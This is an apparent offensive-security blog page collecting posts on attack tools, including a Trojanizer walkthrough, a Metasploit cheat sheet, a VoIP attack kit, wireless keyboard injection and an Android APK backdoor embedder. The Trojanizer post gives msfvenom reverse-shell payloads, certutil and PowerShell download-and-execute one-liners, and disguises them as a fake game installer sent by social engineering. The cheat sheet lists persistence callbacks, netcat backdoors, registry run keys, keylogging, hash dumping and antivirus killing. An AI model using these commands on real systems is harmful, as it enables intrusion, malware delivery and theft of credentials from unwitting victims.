Security of Information, Threat Intelligence, Hacking, Offensive Security, Pentest, Open Source, Hackers Tools, Leaks, Pr1v8, Premium Courses Free, etc

  • Penetration Testing Distribution - BackBox

    BackBox is a penetration test and security assessment oriented Ubuntu-based Linux distribution providing a network and informatic systems analysis toolkit. It includes a complete set of tools required for ethical hacking and security testing...
  • Pentest Distro Linux - Weakerth4n

    Weakerth4n is a penetration testing distribution which is built from Debian Squeeze.For the desktop environment it uses Fluxbox...
  • The Amnesic Incognito Live System - Tails

    Tails is a live system that aims to preserve your privacy and anonymity. It helps you to use the Internet anonymously and circumvent censorship...
  • Penetration Testing Distribution - BlackArch

    BlackArch is a penetration testing distribution based on Arch Linux that provides a large amount of cyber security tools. It is an open-source distro created specially for penetration testers and security researchers...
  • The Best Penetration Testing Distribution - Kali Linux

    Kali Linux is a Debian-based distribution for digital forensics and penetration testing, developed and maintained by Offensive Security. Mati Aharoni and Devon Kearns rewrote BackTrack...
  • Friendly OS designed for Pentesting - ParrotOS

    Parrot Security OS is a cloud friendly operating system designed for Pentesting, Computer Forensic, Reverse engineering, Hacking, Cloud pentesting...
Showing posts with label MetaSploit. Show all posts
Showing posts with label MetaSploit. Show all posts

Tuesday, January 23, 2018

Trojanize Your Payload (WinRAR [SFX] Automatization) - Trojanizer


The Trojanizer tool uses WinRAR (SFX) to compress the two files input by user, and transforms it into an SFX executable(.exe) archive. The sfx archive when executed it will run both files (our payload and the legit appl at the same time).

To make the archive less suspicious to target at execution time, trojanizer will try to replace the default icon(.ico) of the sfx file with a user-selected one, and supress all SFX archive sandbox msgs (Silent=1 | Overwrite=1).

Trojanizer will not build trojans, but from target perspective, it replicates the trojan behavior'
(execute the payload in background, while the legit application executes in foreground).

DEPENDENCIES (backend applications)

Zenity (bash-GUIs) | Wine (x86|x64) | WinRAr.exe (installed-in-wine)
"Trojanizer.sh will download/install all dependencies as they are needed"

It is recomended to edit and config the option: SYSTEM_ARCH=[ your_sys_arch ] in the 'settings' file before attempting to run the tool for the first time.


PAYLOADS (agents) ACCEPTED

.exe | .bat | .vbs | .ps1
"All payloads that windows/SFX can auto-extract-execute"

HINT: If sellected 'SINGLE_EXEC=ON' in the settings file, then trojanizer will accept any kind of extension to be inputed.

LEGIT APPLICATIONS ACCEPTED (decoys)

.exe | .bat | .vbs | .ps1 | .jpg | .bmp | .doc | .ppt | etc ..
"All applications that windows/SFX can auto-extract-execute"

ADVANCED SETTINGS


Trojanizer 'advanced options' are only accessible in the 'settings' file, and they can only be configurated before running the main tool (Trojanizer.sh)

-- Presetup advanced option
Trojanizer can be configurated to execute a program + command before the extraction/execution of the two compressed files (SFX archive). This allow users to take advantage of pre-installed software to execute a remote command before the actual extraction occurs in target system. If active, trojanizer will asks (zenity sandbox) for the command to be executed 


-- single_file_execution
Lets look at the follow scenario: You have a dll payload to input that you need to execute upon extraction, but sfx archives can not execute directly dll files, This setting allow users to input one batch script(.bat) that its going to be used to execute the dll payload. All that Trojanizer needs to Do its to instruct the SFX archive to extract both files and them execute the script.bat 


single_file_execution switch default behavior its to compress the two files inputed by user but only execute one of them at extraction time (the 2ยบ file inputed will be executed) ...

TROJANIZER AND APPL WHITELISTING BYPASSES

A lot of awesome work has been done by a lot of people, especially @subTee, regarding  application whitelisting bypass, which is eventually what we want here: execute arbitrary code abusing Microsoft built-in binaries. Windows oneliners to download remote payload and execute arbitrary code

The follow exercise describes how to use trojanizer 'single_file_execution' and 'Presetup' advanced switchs to drop (remote download) and execute any payload using 'certutil' or 'powershell' appl_whitelisting_bypass oneliners ...

1ยบ - use metasploit to build our payload

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.69 LPORT=666 -f exe -o payload.exe

2ยบ - copy payload.exe to apache2 webroot and start service
cp payload.exe /var/www/html/payload.exe
service apache2 start

3ยบ - edit Trojanizer 'settings' file and activate:
PRE_SETUP=ON
SINGLE_EXEC=ON

4ยบ - running trojanizer tool
PAYLOAD TO BE COMPRESSED => /screenshot.png (it will not matter what you compress)
EXECUTE THIS FILE UPON EXTRACTION => /AngryBirds.exe (to be executed as decoy application)
PRESETUP SANDBOX => cmd.exe /c certutil -urlcache -split -f 'http://192.168.1.69/payload.exe', '%TEMP%\\payload.exe'; Start-Process '%TEMP%\\payload.exe'
SFX FILENAME => AngryBirds_installer (the name of the sfx archive to be created)
REPLACE ICON => Windows-Store.ico OR Steam-logo.ico

5ยบ - start a listenner, and send the sfx archive to target using social enginnering
msfconsole -x 'use exploit/multi/handler; set payload windows/meterpreter/reverse_tcp; set lhost 192.168.1.69; set lport 666; exploit'

When the sfx archive its executed, it will download payload.exe from our apache2 webserver to target and execute it before extract 'screenshot.png' and 'AngryBirds.exe' (last one will be executed to serve as decoy)

The follow oneliner uses 'powershell(Downloadfile+start)' method to achieve the same as previous 'certutil' exercise ..
cmd.exe /c powershell.exe -w hidden -c (new-object System.Net.WebClient).Downloadfile('http://192.168.1.69/payload.exe', '%TEMP%\\payload.exe') & start '%TEMP%\\payload.exe'

The follow oneliner uses 'powershell(IEX+downloadstring)' method to achieve allmost the same (payload.ps1 does not touch disk)
cmd.exe /c powershell.exe -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.1.69/payload.ps1'))"

DOWNLOAD/INSTALL
1ยบ - Download framework from github
     git clone https://github.com/r00t-3xp10it/trojanizer.git

2ยบ - Set files execution permitions
     cd trojanizer
     sudo chmod +x *.sh

3ยบ - config framework
     nano settings

4ยบ - Run main tool
     sudo ./Trojanizer.sh

Framework Screenshots

xsf.conf - execute both files upon extraction (trojan behavior)



xsf.conf - single_file_execution + Presetup (advanced options)


xsf.conf - single_file_execution + Presetup + appl_whitelisting_bypass (certutil)


xsf.conf - single_file_execution + Presetup + appl_whitelisting_bypass (powershell IEX)


Final sfx archive with icon changed


Inside the sfx archive (open with winrar) - trojan behavior


Inside the sfx archive (open with winrar) - single_file_execution



Video tutorials

Trojanizer - single_file_execution (not trojan behavior)


Trojanizer - AVG anti-virus fake installer (trojan behavior)




Share:

Thursday, July 27, 2017

VoIP Penetration Testing and Exploitation Kit - Viproy



Viproy Voip Pen-Test Kit provides penetration testing modules for VoIP networks. It supports signalling analysis for SIP and Skinny protocols, IP phone services and network infrastructure. Viproy 2.0 is released at Blackhat Arsenal USA 2014 with TCP/TLS support for SIP, vendor extentions support, Cisco CDP spoofer/sniffer, Cisco Skinny protocol analysers, VOSS exploits and network analysis modules. Furthermore, Viproy provides SIP and Skinny development libraries for custom fuzzing and analyse modules.

Current Version and Updates
Current version: 4.1 (Requires ruby 2.1.X and Metasploit Framework Github Repo)
Pre-installed repo: https://github.com/fozavci/metasploit-framework-with-viproy

Homepage of Project
http://viproy.com

Talks

Black Hat USA 2016 - VoIP Wars: The Phreakers Awaken
https://www.slideshare.net/fozavci/voip-wars-the-phreakers-awaken
https://www.youtube.com/watch?v=rl_kp5UZKlw

DEF CON 24 - VoIP Wars: The Live Workshop
To be added later

Black Hat Europe 2015 - VoIP Wars: Destroying Jar Jar Lync
http://www.slideshare.net/fozavci/voip-wars-destroying-jar-jar-lync-unfiltered-version
https://youtu.be/TMdiXYzY8qY

DEF CON 23 - The Art of VoIP Hacking Workshop Slide Deck
http://www.slideshare.net/fozavci/the-art-of-voip-hacking-defcon-23-workshop
https://youtu.be/hwDD7K9oXeI

Black Hat USA 2014 / DEF CON 22 - VoIP Wars: Attack of the Cisco Phones
https://www.youtube.com/watch?v=hqL25srtoEY

DEF CON 21 - VoIP Wars: Return of the SIP
https://www.youtube.com/watch?v=d6cGlTB6qKw

Attacking SIP/VoIP Servers Using Viproy
https://www.youtube.com/watch?v=AbXh_L0-Y5A

Current Testing Modules
  • SIP Register
  • SIP Invite
  • SIP Message
  • SIP Negotiate
  • SIP Options
  • SIP Subscribe
  • SIP Enumerate
  • SIP Brute Force
  • SIP Trust Hacking
  • SIP UDP Amplification DoS
  • SIP Proxy Bounce
  • Skinny Register
  • Skinny Call
  • Skinny Call Forward
  • CUCDM Call Forwarder
  • CUCDM Speed Dial Manipulator
  • MITM Proxy TCP
  • MITM Proxy UDP
  • Cisco CDP Spoofer
  • Boghe VoIP Client INVITE PoC Exploit (New)
  • Boghe VoIP Client MSRP PoC Exploit (New)
  • SIP Message with INVITE Support (New)
  • Sample SIP SDP Fuzzer (New)
  • MSRP Message Tester with SIP INVITE Support (New)
  • Sample MSRP Message Fuzzer with SIP INVITE Support (New)
  • Sample MSRP Message Header Fuzzer with SIP INVITE Support (New)

Documentation

Installation
Copy "lib" and "modules" folders' content to Metasploit root directory.
Mixins.rb File (lib/msf/core/auxiliary/mixins.rb) should contains the following lines
require 'msf/core/auxiliary/sip'
require 'msf/core/auxiliary/skinny'
require 'msf/core/auxiliary/msrp'

Usage of SIP Modules
https://github.com/fozavci/viproy-voipkit/blob/master/SIPUSAGE.md

Usage of Skinny Modules
https://github.com/fozavci/viproy-voipkit/blob/master/SKINNYUSAGE.md

Usage of Auxiliary Viproy Modules
https://github.com/fozavci/viproy-voipkit/blob/master/OTHERSUSAGE.md


Share:

Tuesday, July 18, 2017

Metasploit Cheatsheet




Metasploit Cheatsheet


Cheat sheet of Metasploit… Commands are as follows..

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST rmccurdy.com
set LPORT 21
set ExitOnSession false

# set AutoRunScript pathto script you want to autorun after exploit is run

set AutoRunScript persistence -r 75.139.158.51 -p 21 -A -X -i 30
exploit -j -z

# file_autopwn

rm -Rf /tmp/1
mkdir /tmp/1
rm -Rf ~/.msf3

wget -O /tmp/file3.pdf https://www1.nga.mil/Newsroom/PressR…s/nga10_02.pdf

./msfconsole

db_driver sqlite3
db_create pentest11
setg LHOST 75.139.158.51
setg LPORT 21
setg SRVPORT 21
setg LPORT_WIN32 21

setg INFILENAME /tmp/file3.pdf

use auxiliary/server/file_autopwn

set OUTPATH /tmp/1

set URIPATH /msf
set SSL true
set ExitOnSession false
set PAYLOAD windows/meterpreter/reverse_tcp
setg PAYLOAD windows/meterpreter/reverse_tcp
set AutoRunScript persistence -r 75.139.158.51 -p 21 -A -X -i 30
run

# shows all the scripts

run

# persistence! broken …if you use DNS name ..

run persistence -r 75.139.158.51 -p 21 -A -X -i 30
run get_pidgin_creds
idletime
sysinfo

# SYSTEM SHELL ( pick a proc that is run by system )

migrate 376
shell

# session hijack tokens

use incognito
impersonate_token “NT AUTHORITY\\SYSTEM”

# escalate to system

use priv
getsystem
execute -f cmd.exe -H -c -i -t
execute -f cmd.exe -i -t

# list top used apps

run prefetchtool -x 20

# list installed apps

run prefetchtool -p
run get_local_subnets

# find and download files

run search_dwld “%USERPROFILE%\\my documents” passwd
run search_dwld “%USERPROFILE%\\desktop passwd
run search_dwld “%USERPROFILE%\\my documents” office
run search_dwld “%USERPROFILE%\\desktop” office

# alternate

download -r “%USERPROFILE%\\desktop” ~/
download -r “%USERPROFILE%\\my documents” ~/

# alternate to shell not SYSTEM
# execute -f cmd.exe -H -c -i -t

# does some run wmic commands etc

run winenum

# rev shell the hard way

run scheduleme -m 1 -u /tmp/nc.exe -o “-e cmd.exe -L -p 8080”

# An example of a run of the file to download via tftp of Netcat and then running it as a backdoor.

run schtasksabuse-dev -t 192.168.1.7 -c “tftp -i 192.168.1.8 GET nc.exe,nc -L -p 8080 -e cmd.exe” -d 4
run schtasksabuse -t 192.168.1.7 -c “tftp -i 192.168.1.8 GET nc.exe,nc -L -p 8080 -e cmd.exe” -d 4

# vnc / port fwd for linux

run vnc

# priv esc

run kitrap0d
run getgui

# somewhat broken .. google sdt cleaner NtTerminateProcess !@?!?!

run killav
run winemun
run memdump
run screen_unlock

upload /tmp/system32.exe C:\\windows\\system32\\
reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion \\run
reg setval -k HKLM\\software\\microsoft\\windows\\currentversion \\run -v system32 -d “C:\\windows\\system32\\system32.exe -Ldp 455 -e cmd.exe”
reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion \\Run -v system32
reg enumkey -k HKLM\\system\\controlset001\services\\sharedaccess \\parameters\\firewallpolicy\\Standardprofile\\aut horizedapplications\\list
reg setval -k HKLM\\system\\controlset001\services\\sharedaccess \\parameters\\firewallpolicy\\Standardprofile\\aut horizedapplications\\list -v sys
reg queryval -k HKLM\\system\\controlset001\services\\sharedaccess \\parameters\\firewallpolicy\\Standardprofile\\aut horizedapplications\\list -v system32
upload /neo/wallpaper1.bmp “C:\\documents and settings\\pentest3\\local settings\\application data\\microsoft\\”

getuid
ps
getpid
keyscan_start
keyscan_dump
migrate 520
portfwd add -L 104.4.4 -l 6666 -r 192.168.1.1 -p 80″
portfwd add -L 192.168.1.1 -l -r 10.5.5.5 -p 6666

shell
run myremotefileserver_mserver -h
run myremotefileserver_mserver -p 8787

run msf_bind
run msf_bind -p 1975
rev2self
getuid

getuid

enumdesktops
grabdesktop

run deploymsf -f framework-3.3-dev.exe

run hashdump
run metsvc
run scraper
run checkvm
run keylogrecorder
run netenum -fl -hl localhostlist.txt -d google.com
run netenum -rl -r 10.192.0.50-10.192.0.254
run netenum -st -d google.com
run netenum -ps -r 10.192.0.50-254

# Windows Login Brute Force Meterpreter Script

run winbf -h

# upload a script or executable and run it

uploadexec

# Using Payload As A Backdoor from a shell

REG add HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Run /v firewall /t REG_SZ /d “c:\windows\system32\metabkdr.exe” /f
at 19:00 /every:M,T,W,Th,F cmd /c start “%USERPROFILE%\metabkdr.exe”
SCHTASKS /Create /RU “SYSTEM” /SC MINUTE /MO 45 /TN FIREWALL /TR “%USERPROFILE%\metabkdr.exe” /ED 11/11/2011

# kill AV this will not unload it from mem it needs reboot or kill from memory still … 

Darkspy, Seem, Icesword GUI can kill the tasks
catchme.exe -K “c:\Program Files\Kaspersky\avp.exe”
catchme.exe -E “c:\Program Files\Kaspersky\avp.exe”
catchme.exe -O “c:\Program Files\Kaspersky\avp.exe” dummy


Offsec 
Share:

Saturday, June 24, 2017

Wireless Mouse/Keyboard Attack With Replay/Transmit PoC - Mousejack Transmit


This is code extending the mousejack tools https://github.com/RFStorm/mousejack.
Replay/transmit tools have been added to the original tools.
POC packets based on a Logitech Wireless Combo MK220 which consists of a K220 wireless keyboard and an M150 wireless mouse are included in the logs folder.
More details available here https://www.ckn.io/blog/2016/07/09/hijacking-wireless-mice-and-keyboards/

Scanner
Pseudo-promiscuous mode device discovery tool, which sweeps a list of channels and prints out decoded Enhanced Shockburst packets.
usage: ./nrf24-scanner.py [-h] [-c N [N ...]] [-v] [-l] [-p PREFIX] [-d DWELL]

optional arguments:
  -h, --help                          show this help message and exit
  -c N [N ...], --channels N [N ...]  RF channels
  -v, --verbose                       Enable verbose output
  -l, --lna                           Enable the LNA (for CrazyRadio PA dongles)
  -p PREFIX, --prefix PREFIX          Promiscuous mode address prefix
  -d DWELL, --dwell DWELL             Dwell time per channel, in milliseconds
Scan for devices on channels 1-5
./nrf24-scanner.py -c {1..5}
Scan for devices with an address starting in 0xA9 on all channels
./nrf24-scanner.py -p A9

Sniffer
Device following sniffer, which follows a specific nRF24 device as it hops, and prints out decoded Enhanced Shockburst packets from the device. This version has also been modified to log the packets to a log file
usage: ./nrf24-sniffer.py [-h] [-c N [N ...]] [-v] [-l] -a ADDRESS -o OUTPUT [-t TIMEOUT] [-k ACK_TIMEOUT] [-r RETRIES] 

optional arguments:
  -h, --help                                 show this help message and exit
  -c N [N ...], --channels N [N ...]         RF channels
  -v, --verbose                              Enable verbose output
  -l, --lna                                  Enable the LNA (for CrazyRadio PA dongles)
  -a ADDRESS, --address ADDRESS              Address to sniff, following as it changes channels
  -o OUTPUT, --output OUTPUT                 Output file to log the packets
  -t TIMEOUT, --timeout TIMEOUT              Channel timeout, in milliseconds
  -k ACK_TIMEOUT, --ack_timeout ACK_TIMEOUT  ACK timeout in microseconds, accepts [250,4000], step 250
  -r RETRIES, --retries RETRIES              Auto retry limit, accepts [0,15]
Sniff packets from address 8C:D3:0F:3E:B4 on all channels and save them to output.log
./nrf24-sniffer.py -a 8C:D3:0F:3E:B4 -o logs/output.log

Replay/transmit
Replay captured packets or transmit generated ones. It follows a specific nRF24 device as it hops, and sends packets from a log file.
usage: ./nrf24-replay.py [-h] [-c N [N ...]] [-v] [-l] -a ADDRESS -i INPUT_FILE [-t TIMEOUT] [-k ACK_TIMEOUT] [-r RETRIES] 

optional arguments:
  -h, --help                                 show this help message and exit
  -c N [N ...], --channels N [N ...]         RF channels
  -v, --verbose                              Enable verbose output
  -l, --lna                                  Enable the LNA (for CrazyRadio PA dongles)
  -a ADDRESS, --address ADDRESS              Address to sniff, following as it changes channels
  -o INPUT_FILE, --input INPUT_FILE          Input file that has the packets to sned
  -t TIMEOUT, --timeout TIMEOUT              Channel timeout, in milliseconds
  -k ACK_TIMEOUT, --ack_timeout ACK_TIMEOUT  ACK timeout in microseconds, accepts [250,4000], step 250
  -r RETRIES, --retries RETRIES              Auto retry limit, accepts [0,15]
Send packets from file keystroke.log to address 8C:D3:0F:3E:B4 on hopping channel
./nrf24-replay.py -a 8C:D3:0F:3E:B4 -i logs/keystroke.log

Network mapper
Star network mapper, which attempts to discover the active addresses in a star network by changing the last byte in the given address, and pinging each of 256 possible addresses on each channel in the channel list.
usage: ./nrf24-network-mapper.py [-h] [-c N [N ...]] [-v] [-l] -a ADDRESS [-p PASSES] [-k ACK_TIMEOUT] [-r RETRIES]

optional arguments:
  -h, --help                                 show this help message and exit
  -c N [N ...], --channels N [N ...]         RF channels
  -v, --verbose                              Enable verbose output
  -l, --lna                                  Enable the LNA (for CrazyRadio PA dongles)
  -a ADDRESS, --address ADDRESS              Known address
  -p PASSES, --passes PASSES                 Number of passes (default 2)
  -k ACK_TIMEOUT, --ack_timeout ACK_TIMEOUT  ACK timeout in microseconds, accepts [250,4000], step 250
  -r RETRIES, --retries RETRIES              Auto retry limit, accepts [0,15]
Map the star network that address 61:49:66:82:03 belongs to
./nrf24-network-mapper.py -a 61:49:66:82:03

Continuous tone test
The nRF24LU1+ chips include a test mechanism to transmit a continuous tone, the frequency of which can be verified if you have access to an SDR. There is the potential for frequency offsets between devices to cause unexpected behavior. For instance, one of the SparkFun breakout boards that was tested had a frequency offset of ~300kHz, which caused it to receive packets on two adjacent channels.
This script will cause the transceiver to transmit a tone on the first channel that is passed in.
usage: ./nrf24-continuous-tone-test.py [-h] [-c N [N ...]] [-v] [-l]

optional arguments:
  -h, --help                          show this help message and exit
  -c N [N ...], --channels N [N ...]  RF channels
  -v, --verbose                       Enable verbose output
  -l, --lna                           Enable the LNA (for CrazyRadio PA dongles)
Transmit a continuous tone at 2405MHz
./nrf24-continuous-tone-test.py -c 5

Packet generator script
This uses a dictionary to map keyboard presses to the equivalent packets. It reads stdin input and logs the mapped packets to logs/keystrokes.log. It will accept input until Ctrl+C is pressed.
usage: ./keymapper.py 

Log files
The folder logs contains various pre-saved packets for various keyboard operations.
Shell.log is for exploitation of a Windows machine by running a powershell one-liner which connects back to the attacker machine.
The file keys.log serves as a reference where various key presses and combinations are mapped to their equivalent packets.

Demo
A demo of exploiting a Windows machine:


Share:

Tuesday, November 1, 2016

Android APK Backdoor Embedder - Spade



Quick and handy APK backdoor embedder with metasploit android payloads.

Requirements

Installation and execution
Then you can download smap by cloning the Git repository:
git clone https://github.com/suraj-root/spade.git
cd spade/
./spade.py

Demo video
asciicast

Video YouTube:


Share:

Friday, August 26, 2016

Automated Penetration Toolkit - APT2




This tool will perform an NMap scan, or import the results of a scan from Nexpose, Nessus, or NMap. The processesd results will be used to launch exploit and enumeration modules according to the configurable Safe Level and enumerated service information.

All module results are stored on localhost and are part of APT2's Knowledge Base (KB). The KB is accessible from within the application and allows the user to view the harvested results of an exploit module.

Setup
On Kali Linux install python-nmap library:
sudo pip install python-nmap
sudo pip install neovim

Configuration (Optional)
APT2 uses the default.cfg file in the root directory. Edit this file to configure APT2 to run as you desire.
Current options include:
  • metasploit
  • nmap
  • threading

Metasploit RPC API (metasploit)
APT2 can utuilize your host's Metasploit RPC interface (MSGRPC). Additional Information can be found here: https://help.rapid7.com/metasploit/Content/api-rpc/getting-started-api.html

NMAP
Configure NMAP scan settings to include the target, scan type, scan port range, and scan flags. These settings can be configured while the program is running.

Threading
Configure the number of the threads APT2 will use.

Run:

No Options:
python apt2 or ./apt2

With Configuration File
python apt2 -C <config.txt>

Import Nexpose, Nessus, or NMap XML
python apt2 -f <nmap.xml>

Specify Target Range to Start
python apt2 -f 192.168.1.0/24

Safe Level
Safe levels indicate how safe a module is to run againsts a target. The scale runs from 1 to 5 with 5 being the safest. The default configuration uses a Safe Level of 4 but can be set with the -s or --safelevel command line flags.

Usage:
usage: apt2.py [-h] [-C <config.txt>] [-f [<input file> [<input file> ...]]]
[--target] [--ip <local IP>] [-v] [-s SAFE_LEVEL] [-b]
[--listmodules]

optional arguments:
-h, --help show this help message and exit
-v, --verbosity increase output verbosity
-s SAFE_LEVEL, --safelevel SAFE_LEVEL
set min safe level for modules
-b, --bypassmenu bypass menu and run from command line arguments

inputs:
-C <config.txt> config file
-f [<input file> [<input file> ...]]
one of more input files seperated by spaces
--target initial scan target(s)

ADVANCED:
--ip <local IP> defaults to ip of interface

misc:
--listmodules list out all current modules


Modules
-----------------------
LIST OF CURRENT MODULES
-----------------------
nmaploadxml Load NMap XML File
hydrasmbpassword Attempt to bruteforce SMB passwords
nullsessionrpcclient Test for NULL Session
msf_snmpenumshares Enumerate SMB Shares via LanManager OID Values
nmapbasescan Standard NMap Scan
impacketsecretsdump Test for NULL Session
msf_dumphashes Gather hashes from MSF Sessions
msf_smbuserenum Get List of Users From SMB
anonftp Test for Anonymous FTP
searchnfsshare Search files on NFS Shares
crackPasswordHashJohnTR Attempt to crack any password hashes
msf_vncnoneauth Detect VNC Services with the None authentication type
nmapsslscan NMap SSL Scan
nmapsmbsigning NMap SMB-Signing Scan
responder Run Responder and watch for hashes
msf_openx11 Attempt Login To Open X11 Service
nmapvncbrute NMap VNC Brute Scan
msf_gathersessioninfo Get Info about any new sessions
nmapsmbshares NMap SMB Share Scan
userenumrpcclient Get List of Users From SMB
httpscreenshot Get Screen Shot of Web Pages
httpserverversion Get HTTP Server Version
nullsessionsmbclient Test for NULL Session
openx11 Attempt Login To Open X11 Servicei and Get Screenshot
msf_snmplogin Attempt Login Using Common Community Strings
msf_snmpenumusers Enumerate Local User Accounts Using LanManager/psProcessUsername OID Values
httpoptions Get HTTP Options
nmapnfsshares NMap NFS Share Scan
msf_javarmi Attempt to Exploit A Java RMI Service
anonldap Test for Anonymous LDAP Searches
ssltestsslserver Determine SSL protocols and ciphers
gethostname Determine the hostname for each IP
sslsslscan Determine SSL protocols and ciphers
nmapms08067scan NMap MS08-067 Scan
msf_ms08_067 Attempt to exploit MS08-067



Share:
Copyright © Offensive Sec Blog | Powered by OffensiveSec
Design by OffSec | Theme by Nasa Records | Distributed By Pirate Edition